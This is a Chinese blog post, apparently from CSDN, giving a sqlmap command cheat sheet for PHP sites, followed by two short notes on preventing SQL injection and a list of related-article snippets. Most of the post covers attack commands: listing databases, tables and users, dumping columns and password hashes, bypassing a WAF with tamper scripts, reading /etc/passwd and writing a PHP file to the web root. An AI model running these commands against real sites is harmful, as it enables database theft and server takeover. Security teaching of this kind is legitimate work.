sqlmap对php注入,sqlmap的使用(检测SQL注入的漏洞)以及防护SQL注入

最新推荐文章于 2024-04-15 22:23:32 发布
最新推荐文章于 2024-04-15 22:23:32 发布
阅读量420 收藏
点赞数
文章标签: sqlmap对php注入

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。它由Python语言开发而成,因此运行需要安装python2.7环境。

常用注入:

python sqlmap.py -u 地址 可以查看是否能对当前URL进行注入

python sqlmap.py -u 地址 -v 1 --dbs // 列举数据库列表

python sqlmap.py -u 地址 -v 1 --current-db// 显示当前数据库

python sqlmap.py -u 地址 -v 1 --users // 列举所有数据库用户

python sqlmap.py -u 地址 -v 1 --current-user // 显示当前用户

python sqlmap.py -u 地址 -v 1 -D "database_name" --tables // 列举databas的所有表

python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" --columns // 列举所有字段

python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" -C"columns1,columns2" –dump //导出相关字段

而且SQLMAP会将数据存储在sqlmap/output/

post注入:

先用抓包工具把post的内容拷贝到文件里面去,命名为post.txt

python sqlmap.py -r post.txt -p "user_name,pass"

-r 是指定post请求的文件

-p 是注入需要提交的参数

也可以利用下面的方式进行post注入

python sqlmap.py -u 地址 --forms //自动判断注入

python sqlmap.py -u 地址 --data "指定参数"

3.cookie注入:

如果POST跟GET请求注入都失败的话,可以尝试cookie注入试下。当使用–level 参数>=2的时候sqlmap会检查cookie的参数,先将cookie的信息从请求中复制下来

python sqlmap.py -u 地址 --cookie "参数" --tables --level 2

4.绕过waf防火墙:

假设我们在注入相关地址的时候碰到防火墙可以利用如下方式绕过防火墙

python sqlmap.py -u 地址 -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py

在sqlmap 的 tamper目录下有很多py 编码脚本自行加载

5.下面是几个常用实例:

1.读取数据库版本,当前用户,当前数据库

python sqlmap -u 地址 -f -b –current-user –current-db -v 1

2.判断当前数据库用户权限

python sqlmap -u 地址 –privileges -U 用户名 -v 1

python sqlmap -u 地址 –is-dba -U 用户名 -v 1

3.读取所有数据库用户或指定数据库用户的密码

python sqlmap -u 地址 –users –passwords -v 2

python sqlmap -u 地址 –passwords -U root -v 2

4.file-read读取web文件

python sqlmap -u 地址 –file-read “/etc/passwd” -v 2

5.file-write写入文件到web

python sqlmap -u 地址 –file-write /localhost/mm.php –file-dest

那么我们如何对SQL注入进行防护呢(这边是针对PHP的)

如果数据库驱动支持PDO或者mysqli的话可以使用绑定参数的方式来直接避免SQL注入

如果数据库驱动只支持mysql的话字符串可以使用mysql_real_escape_string来过滤,如果为其他类型的话直接强制转化(如int)这样就能避免大部分SQL注入。

今井在挨揍
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞利用SQL注入sqlmap基础使用
m0_57379855的博客
03-27 2136
漏洞利用SQL注入sqlmap基础使用sqlmap下载sqlmap注入语句sql-las下载部署数据库Less-1Less-5布尔盲注布尔盲注常用语句二次查询注入二次查询常用函数二次查询构造语句报错注入报错注入常用语句Less-9时间盲注时间盲注常用语句 sqlmap下载 sqlmap 可以在Linux里使用,也可以在Windows里使用 使用的前提是要有python环境 sqlmap注入语句 语句 目的 sqlmap -u “http://localhost/sqli-labs/Less
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
基于phpcms的sqlmap工具注入
qq_44060093的博客
08-20 565
SQL注入攻击是一种常用的攻击网站手段。受影响的网站系统: ASP+Access、ASP+SQLServer、PHP+MySQL、PHP+Apache等。 实验原理 SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。 SQLMAP支持五种SQL注入技术: (1)基于布尔值得注入,基于时间的盲注,基于错误的盲注,UNION查询和s
sqlmap靶机注入详细教程
最新发布
Pythonit教程网
04-15 1448
基本用法:使用-u参数指定目标URL,例如:sqlmap -u "http://目标网站/?使用-D -T --columns参数列出指定表的所有列。使用-D -T --dump参数导出指定表的所有数据。
sqlmap查找SQL注入漏洞入门
weixin_30332705的博客
11-21 1061
1、安装sqlmap sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。注意:sqlmap只是用来检测和利用sql注入点的,使用前请先使用扫描工具扫出sql注入点。 它由python语言开发而成,因此运行需要安装python环境。它依赖于python 2.x ,请不要安装python 3.x 1.1 安装pyhon 在Windows上安装Python ...
SQLMAP自动注入
分享学习网络的点点滴滴
08-10 611
开源sql注入漏洞检测、利用工具检测动态页面中get/post参数、cookie、http头数据榨取文件系统访问操作系统命令执行引擎强大、特性丰富Xss漏洞检测
黑客学习-SQL注入:利用Havij对PHPCMS网站进行SQL注入
weixin_49349476的博客
09-21 1920
首先判断是否能SQL注入,之后利用Havij进行SQL注入,获取网站管理员的账号和密码
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx)...
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sqldd:一款碾压sqlmapsql注入漏洞检测系统^^
05-31
Sqli-lib是一款由PHP语言编写SQL注入漏洞闯关游戏,包含了六十几个可注入页面,涵盖了几乎所有类型SQL注入漏洞,同时不同的关卡自定义了不同的过滤规则,是SQL注入漏洞学习的首选靶场。图4-1 本地搭建Sqli-lib环境...
sql注入攻击之sqlmap
06-10
SQLMap是一款自动化工具,专为检测和利用SQL注入漏洞而设计,尤其适合信息安全初学者。 SQLMap的工作原理基于探测、枚举、数据提取和权限提升等步骤。首先,它会尝试探测目标站点是否存在SQL注入漏洞,这通常通过...
全自动注入SqlMap
qq_46219965的博客
08-29 721
全自动注入SqlMap GET注入,POST注入
php主机卫士,Bypass 360主机卫士SQL注入防御(附tamper脚本)
weixin_29599033的博客
03-23 143
0x01 前言在测试过程中,经常会遇到一些主机防护软件,对这方面做了一些尝试,可成功bypass了GET和POST的注入防御,分享一下姿势。0x02 环境搭建Windows Server 2003+phpStudysql注入点测试代码:sql.php$con= mysql_connect("localhost","root","root");if (!$con){die('Could not co...
php 防止sql注入
qq_37235047的博客
02-21 276
sqlmap 较专业的sql注入工具 YII2  activeform   注意传过来的modle的rules规则 $form=\yii\widgets\ActiveForm::begin(['action'=>\yii\helpers\Url::to(['news/testadd'])]); echo $form->field($model, 'title')->text
使用sqlmap对某php网站进行注入实战及安全防范
weixin_34150830的博客
05-30 1817
使用sqlmap对某php网站进行注入实战   一般来讲一旦网站存在sql注入漏洞,通过sql注入漏洞轻者可以获取数据,严重的将获取webshell以及服务器权限,但在实际漏洞利用和测试过程中,也可能因为服务器配置等情况导致无法获取权限。1.1php注入点的发现及扫描1.使用漏洞扫描工具进行漏洞扫描    将目标url地址放在wvs中进行漏洞扫描,如图1所示,扫描结果显示存在SQL盲注和SQL注入...
python如何防止sql注入_如何在PHP中防止SQL注入
weixin_39858275的博客
12-08 67
这里的每一个答案都只涉及问题的一部分。实际上,有四个不同的查询部分可以动态添加到SQL中:一串一个数字标识符语法关键字准备好的陈述只涉及其中两个。但有时我们必须使查询更加动态,同时添加运算符或标识符。所以,我们需要不同的保护技术。一般来说,这种保护方法是基于白名单的。在这种情况下,每个动态参数都应该在脚本中硬编码并从该集中选择。例如,要执行动态排序:$orders = array("name",...
p79 Python 开发-sqlmapapi&Tamper&Pocsuite(含安全狗的安装与开启网站防护
weixin_43263566的博客
03-10 1103
Python 开发-sqlmapapi&Tamper&Pocsuite
php调用sqlmapapi.py,使用sqlmapapi.py批量化扫描实践
weixin_42494742的博客
04-13 191
使用sqlmapapi.py批量化扫描实践0x00 前言sqlmap可谓是sql注入探测的神器,优秀的探测功能可以让任何一个使用者无基础挖掘sql注入。wooyun上关于sqlmap的文章已经有6篇了,都没有科 普sqlmapapi.py。因此我打算分享下这方面的实践。利用sqlmap测试SQL注入的效率很低,每一个url都需要手动测试,这样肯定不是理想状态。 sqlmap的作者肯定也察觉到这一点...
python sql注入检测_sqlmap_检测与利用SQL注入漏洞工具的使用(python版本)
weixin_39573781的博客
12-03 687
sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具。Windows下准备工具如下:1.sqlmapproject-sqlmap-1.3.9-21-gd346192.zip(有需要的可以联系博主)2.python-3.7.4-amd64.exe3.mysql数据库sqlmap压缩包解压得到如下目录:其中sqlmap.py就是需要使用python调用的文件。安装python的过程就不在赘述。...
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值